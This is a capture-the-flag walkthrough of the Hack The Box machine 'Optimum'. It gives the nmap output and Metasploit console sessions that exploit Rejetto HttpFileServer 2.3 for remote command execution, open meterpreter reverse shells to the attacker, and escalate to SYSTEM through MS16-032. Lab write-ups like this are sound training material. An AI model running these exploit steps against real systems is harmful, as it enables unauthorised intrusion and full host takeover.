OS Windows
IP: 10.10.10.8
Machine Author: ch4p
Nmap:-
root@kali:~/Desktop# nmap -sS -sV -O 10.10.10.8
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-19 15:14 EST
Nmap scan report for 10.10.10.8
Host is up (0.15s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2012|7|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.52 seconds
root@kali:~/Desktop#
Web:-
The target machine is running HttpFileserver 2.3 for which there is a public exploit available.
Exploit:- Rejetto HttpFileServer Remote Command Execution
Vulnerabilty Description:-:- Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using ‘%00’ to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
POC:-
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) > set RHOST 10.10.10.8
RHOST => 10.10.10.8
msf exploit(rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(rejetto_hfs_exec) > set LHOST 10.10.*.*
LHOST => 10.10.*.*
msf exploit(rejetto_hfs_exec) > set LPORT 4455
LPORT => 4455
msf exploit(rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.*.*:4455
[*] Using URL: http://0.0.0.0:800/aPrzG0R5eKWK
[*] Local IP: http://192.168.140.136:800/aPrzG0R5eKWK
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /aPrzG0R5eKWK
[*] Sending stage (1189423 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.*.*:4455 -> 10.10.10.8:49162) at 2017-12-19 16:18:59 -0500
[!] Tried to delete %TEMP%\mbSzL.vbs, unknown result
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
Now we have the user Kostas access, the target machine is running windows 2012 x64 so we can try MS16-032 exploit.
Exploit:- MS16-032 Secondary Logon Handle Privilege Escalation
Exploit Description:-:- This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(rejetto_hfs_exec) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET 1
TARGET => 1
msf exploit(ms16_032_secondary_logon_handle_privesc) > set LHOST 10.10.*.*
LHOST => 10.10.*.*
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.*.*:4444
[*] Writing payload file, C:\Users\kostas\Desktop\xHWLMuJ.txt...
[*] Compressing script contents...
[+] Compressed size: 3584
[*] Executing exploit script...
[*] Command shell session 2 opened (10.10.*.*:4444 -> 10.10.10.8:49164) at 2017-12-19 16:53:33 -0500
^C[-] Error while running command exploit:
msf exploit(ms16_032_secondary_logon_handle_privesc) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows OPTIMUM\kostas @ OPTIMUM 10.10.*.*:4455 -> 10.10.10.8:49162 (10.10.10.8)
2 shell x64/windows 10.10.*.*:4444 -> 10.10.10.8:49164 (10.10.10.8)
msf exploit(ms16_032_secondary_logon_handle_privesc) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas\Desktop>whoami
whoami
nt authority\system
C:\Users\kostas\Desktop>type user.txt.txt
type user.txt.txt
****************************
C:\Users\Administrator\Desktop>type root.txt
type root.txt
****************************
C:\Users\Administrator\Desktop>
Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram
Comments